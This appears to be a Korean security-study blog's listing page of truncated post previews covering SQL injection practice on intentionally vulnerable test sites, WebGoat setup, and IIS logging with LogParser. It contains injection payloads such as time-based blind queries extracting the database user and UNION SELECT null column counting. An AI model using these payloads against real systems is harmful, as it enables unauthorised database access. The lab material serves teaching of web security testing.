http://testaspnet.vulnweb.com/ 아무 게시글이나 들어가서 아래와 같은 댓글창을 찾아 들어간다. 들어가면 아래와 같은 창이 뜬다. http://testaspnet.vulnweb.com/Comments.aspx?id=2 AND 1=0 //위 댓글들 안보이게 함 DB아이디 찾아내기 ex) http://192.168.0.24/MySite/board/board_view.asp?num=7;if(ascii(substring((select system_user), 1, 1))>115) waitfor delay '0:0:5' http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user..
WebGoat 7.1 Setting 및 활용 1. https://github.com/WebGoat/WebGoat/releases/tag/7.1로 들어간다. //(webgoat 7.1 download검색 가능) → https://github.com/WebGoat/WebGoat/releases/tag/7.0.1 2. webgoat-container-7.0.1-war-exec.jar 다운로드 webgoat-container-7.0.1-war-exec.jar파일을 자신의 ASP 폴더에 넣는다. [D:\class\ASP] 3. CMD를 킨다. d: //디렉터리 이동 cd class\ASP //디렉터리 이동 java -jar webgoat-container-7.0.1-war-exec.jar //실행파일 실행 ※ 사..
sql injection테스트 사이트 : http://testphp.vulnweb.com/listproducts.php?cat=1 pictures The shore Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. painted by: r4w8173 comment on this picture Mistery Donec molestie. Sed aliquam sem ut arcu. painted by: r4w8173 comment on this picture The univer testphp.vulnweb.com [실습1] union을 이용해서 페이지에서 실행되는 sql문의 필드의 ..
UNION SQL Injection : 2개 이상의 쿼리를 요청해 결과를 얻는 SQL연산자, 공격자는 이를 악용해 원래의 요청에 한 개의 추가 쿼리를 삽입해 정보를 얻어내는 방식 - 실제 사이트의 경우 null방법을 이용해 필드의 개수 확인 select문 union select null; //오류 -> 앞쪽 select문 필드 1개 아님 select문 union select null, null; //오류 -> 필드 2개 아님 : select문 union select null, null, null, null, null, null; //실행 -> 필드 6개이다. ================================================== *Union을 이용한 SQL Injection (MySQ..
LogParser 설치 아래 링크에서 다운로드가 가능하다. www.microsoft.com/en-us/download/details.aspx?id=24659 Log Parser 2.2 Log parser is a powerful, versatile tool that provides universal query access to text-based data such as log files, XML files and CSV files, as well as key data sources on the Windows® operating system such as the Event Log, the Registry, the file system, www.microsoft.com 다운로드가 된 위치를 확인한다. .ex..
제어판 - 프로그램 - Window 기능 켜기/끄기 - WWW 서비스 - 상태 및 진단 클릭 후 확인하면 로깅기능이 설치된다. IIS관리자 - Default Web Site - 로깅이 추가되어있고, 들어가보면 로그형식, 로그저장 경로가 있다. 필요한 항목만 보기 위해 필드선택을 누르고 선택한다. 여기까지 했다면 IIS관리자 - 로깅 항목에 적혀있는 파일 위치에 가보면 로그 파일이 존재한다. 기본 위치 : C:\inetpub\logs\LogFiles\W3SVC1 웹로그(W3C 포맷) Log Sample #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-09-16 00:02:30 #Fields: time c-ip..
